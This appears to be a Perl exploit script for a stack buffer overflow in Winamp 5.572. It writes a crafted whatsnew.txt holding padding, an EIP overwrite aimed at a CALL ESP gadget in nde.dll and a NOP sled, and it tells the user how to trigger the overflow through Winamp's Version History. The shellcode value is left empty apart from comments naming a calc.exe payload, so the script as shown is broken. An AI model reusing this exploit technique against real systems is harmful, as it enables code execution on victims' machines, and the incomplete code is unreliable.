# Tested on: WinXP SP3 De
# Still learning, having some fun...
# Greetz to _-Sid-_ >Roadkill< Jess Dawn Linki
# Special greetz do Debug, even i dont know you. Nice find man.
# Exploit has something around 70% chance of success.
print "\n#########################################\n";
print "# Winamp 5.572 stack buffer overflow#\n";
print "# PoC by: Debug (eldadru\@gmail.com) #\n";
print "# Exploit by: NeoCortex (ICQ 158005940) #\n";
print "#########################################\n";
print "____________________\n";
print " ________/\\/ / ____/ ____/ ________\n";
print "________/_______/ / /\\ \\/ / /___/ / / / / /_______/ ________ \n";
print " /_______/ _______ / /\\ \\/ / /_____/ / / / ________/_______/\n";
print "/_______/ / /\\ \\/ / /_____/ /___/ / /_______/\n";
print " /_/\\__/_______/_______/\n";
print " Where's the next phone box to the matrix please?\n\n\n";
my $version = "Winamp 5.572";
my $junk = "\x41" x 540;
my $eip = "\xad\x86\x0e\x07"; # overwrite EIP - 070E86AD FFD4 CALL ESP nde.dll
my $nop = "\x90" x 100;
my $shellcode =
# payload taken from http://www.metasploit.com
# windows/exec cmd=calc.exe
open (myfile,'>> whatsnew.txt');
print myfile $version.$junk.$eip.$nop.$shellcode;
print "[+] whatsnew.txt written.\n";
print "[ ] Now copy it to your winamp folder...\n";
print "[ ] Run winamp and hit [About Winamp]->[Version History]\n";